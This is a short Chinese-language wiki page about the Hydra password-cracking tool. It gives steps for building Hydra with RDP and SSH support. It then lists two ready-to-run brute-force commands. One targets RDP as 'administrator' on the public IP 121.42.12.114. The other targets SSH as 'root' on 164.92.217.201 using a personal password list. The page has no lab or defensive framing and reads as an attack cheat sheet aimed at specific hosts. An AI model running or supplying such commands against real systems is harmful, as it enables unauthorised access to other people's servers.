Hydra

来自MediaWiki
跳转到导航 跳转到搜索

为了编译rdp模块,需要安装freerdp

sudo apt install freerdp2-dev -y

sudo apt install libssh-dev -y

编译安装hydra[编辑 | 编辑源代码]

git clone https://github.com/vanhauser-thc/thc-hydra.git
./configure
make 
make install

rdp爆破[编辑 | 编辑源代码]

hydra 121.42.12.114 rdp -l administrator -P 3389passwd.txt -V

ssh[编辑 | 编辑源代码]

hydra 164.92.217.201 ssh -l root -P 字典自用版.txt -V